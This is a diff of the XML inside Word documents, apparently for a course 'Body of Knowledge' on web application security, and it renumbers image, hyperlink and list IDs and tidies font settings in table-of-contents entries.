-                    <a:blip r:embed="rId22">
+                    <a:blip r:embed="rId26">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5234,7 +5989,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId23">
+                    <a:blip r:embed="rId27">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5367,7 +6122,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId24" cstate="print">
+                    <a:blip r:embed="rId28" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5607,7 +6362,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId25">
+                    <a:blip r:embed="rId29">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5732,7 +6487,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId26">
+                    <a:blip r:embed="rId30">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -5912,7 +6667,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId27">
+                    <a:blip r:embed="rId31">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6110,7 +6865,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId28">
+                    <a:blip r:embed="rId32">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6307,7 +7062,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29">
+                    <a:blip r:embed="rId33">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6434,7 +7189,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId30">
+                    <a:blip r:embed="rId34">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6491,7 +7246,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:hyperlink r:id="rId31" w:history="1">
+      <w:hyperlink r:id="rId35" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6589,7 +7344,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId32">
+                    <a:blip r:embed="rId36">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -6915,7 +7670,7 @@
         </w:rPr>
         <w:t xml:space="preserve">(10), 94–100. </w:t>
       </w:r>
-      <w:hyperlink r:id="rId33" w:history="1">
+      <w:hyperlink r:id="rId37" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -6978,7 +7733,7 @@
         </w:rPr>
         <w:t xml:space="preserve">. Security Boulevard. Retrieved September 9, 2022, from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId34" w:history="1">
+      <w:hyperlink r:id="rId38" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7050,7 +7805,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> Security Blog. Retrieved September 9, 2022, from </w:t>
       </w:r>
-      <w:hyperlink r:id="rId35" w:history="1">
+      <w:hyperlink r:id="rId39" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -7095,7 +7850,7 @@
       </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId36"/>
+      <w:headerReference w:type="default" r:id="rId40"/>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
       <w:cols w:space="708"/>
@@ -7415,6 +8170,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="152906FE"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="50BCAC92"/>
+    <w:lvl w:ilvl="0" w:tplc="6840BB84">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1-"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="08090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1CBC05CF"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="F8E8A66E"/>
@@ -7563,7 +8407,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3360242C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EFFC26B0"/>
@@ -7675,7 +8519,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="45A04B6C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="51DCB3DC"/>
@@ -7788,7 +8632,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="48106167"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E60CD598"/>
@@ -7901,7 +8745,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4A567B8C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AF749F56"/>
@@ -8013,7 +8857,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="56F06E6B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9B489BAC"/>
@@ -8126,7 +8970,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="662D1B3C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EFEE479C"/>
@@ -8212,7 +9056,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="666F0EA3"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="6C30CA14"/>
@@ -8325,7 +9169,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="69CF7DA5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BFD62A44"/>
@@ -8437,120 +9281,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="762402F2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
-    <w:tmpl w:val="71A42722"/>
-    <w:lvl w:ilvl="0" w:tplc="08090001">
+    <w:tmpl w:val="58D2F8DC"/>
+    <w:lvl w:ilvl="0" w:tplc="0809000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="720" w:hanging="360"/>
+        <w:ind w:left="2880" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="08090003" w:tentative="1">
+    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="1440" w:hanging="360"/>
+        <w:ind w:left="3600" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="08090005" w:tentative="1">
+    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2160" w:hanging="360"/>
+        <w:ind w:left="4320" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
+    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
+        <w:ind w:left="5040" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
+    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
+        <w:ind w:left="5760" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
+    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
       <w:lvlJc w:val="left"/>
       <w:pPr>
-        <w:ind w:left="4320" w:hanging="360"/>
+        <w:ind w:left="6480" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="o"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="6480" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-      </w:rPr>
-    </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7C440E2D"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="077453B6"/>
@@ -8699,7 +9543,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="7D592090"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EE2A680C"/>
@@ -8816,43 +9660,46 @@
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="375737098">
-    <w:abstractNumId w:val="11"/>
+    <w:abstractNumId w:val="12"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1564438774">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="645158986">
-    <w:abstractNumId w:val="9"/>
+    <w:abstractNumId w:val="10"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1112478449">
-    <w:abstractNumId w:val="7"/>
+    <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1367681353">
-    <w:abstractNumId w:val="12"/>
+    <w:abstractNumId w:val="13"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="624894024">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="8" w16cid:durableId="1675263311">
-    <w:abstractNumId w:val="10"/>
+    <w:abstractNumId w:val="11"/>
   </w:num>
   <w:num w:numId="9" w16cid:durableId="64765147">
-    <w:abstractNumId w:val="8"/>
+    <w:abstractNumId w:val="9"/>
   </w:num>
   <w:num w:numId="10" w16cid:durableId="41755761">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="11" w16cid:durableId="1412846859">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="12" w16cid:durableId="1053771558">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="13" w16cid:durableId="1387921412">
     <w:abstractNumId w:val="6"/>
   </w:num>
-  <w:num w:numId="12" w16cid:durableId="1053771558">
-    <w:abstractNumId w:val="4"/>
+  <w:num w:numId="14" w16cid:durableId="1179661771">
+    <w:abstractNumId w:val="14"/>
   </w:num>
-  <w:num w:numId="13" w16cid:durableId="1387921412">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
-  <w:num w:numId="14" w16cid:durableId="1179661771">
-    <w:abstractNumId w:val="13"/>
+  <w:num w:numId="15" w16cid:durableId="797921329">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>

--- a/BoK.docx
+++ b/BoK.docx
@@ -278,7 +278,7 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
@@ -307,18 +307,17 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc113747821" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154854" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
               </w:rPr>
               <w:t>INTRODUCTION</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -326,7 +325,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -334,22 +332,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747821 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154854 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -357,7 +352,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -365,7 +359,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -380,23 +373,22 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747822" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154855" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
               </w:rPr>
               <w:t>IT Background</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -404,7 +396,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -412,22 +403,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747822 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154855 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -435,7 +423,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -443,7 +430,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -458,23 +444,22 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113747823" w:history="1">
+          <w:hyperlink w:anchor="_Toc114154856" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
                 <w:noProof/>
               </w:rPr>
               <w:t>(BOK) Web Application Security (week 1-4)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -482,7 +467,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -490,22 +474,19 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113747823 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc114154856 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -513,7 +494,6 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
                 <w:webHidden/>
